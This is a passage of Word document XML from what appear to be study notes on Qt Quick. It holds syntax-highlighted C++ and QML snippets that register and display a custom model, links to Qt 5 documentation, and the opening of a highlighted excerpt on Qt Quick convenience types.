                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> registerTypes</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>const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char</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uri</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rPr>
              <w:t xml:space="preserve">        qmlRegisterType</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>MyModel</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;(</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>0</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rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"MyModel"</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00991333" w:rsidRPr="0088385D" w:rsidTr="00991333">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88385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>QML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8617"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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MyModel</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id</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myModel</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ListElement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someProperty</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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"some value"</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pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ListView</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width</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200</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height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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>250</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model</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myModel</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>delegate</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Text</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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text</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> someProperty </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2666" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Writing QML Extensions with C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for details on writing QML C++ plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2667" w:history="1">
        <w:r w:rsidR="00991333" w:rsidRPr="00CF7F87">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000B1D83" w:rsidRDefault="000B1D83" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B1D83" w:rsidRPr="00EC78A6" w:rsidRDefault="00EC78A6" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC78A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>18.05.2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC78A6" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2668" w:history="1">
        <w:r w:rsidR="00BB63D0" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-convenience-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="008D4C56" w:rsidRDefault="00BB63D0" w:rsidP="008D4C56">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2377" w:name="_Toc483001042"/>
      <w:bookmarkStart w:id="2378" w:name="_Toc483004031"/>
      <w:bookmarkStart w:id="2379" w:name="_Toc483604383"/>
      <w:bookmarkStart w:id="2380" w:name="_Toc483605603"/>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concept</w:t>
      </w:r>
      <w:bookmarkStart w:id="2381" w:name="тут"/>
      <w:bookmarkEnd w:id="2381"/>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s In Qt Quick - Convenience Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2377"/>
      <w:bookmarkEnd w:id="2378"/>
      <w:bookmarkEnd w:id="2379"/>
      <w:bookmarkEnd w:id="2380"/>
    </w:p>
    <w:p w:rsidR="00BB63D0" w:rsidRPr="00BB63D0" w:rsidRDefault="00BB63D0" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly dynamic user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the application developer will often wish to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>react to events and trigger various response logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. QML has </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>built-in support for these concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">signals </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamic object instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick expands</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> upon the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>support</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by the language </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with various convenience types</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB63D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
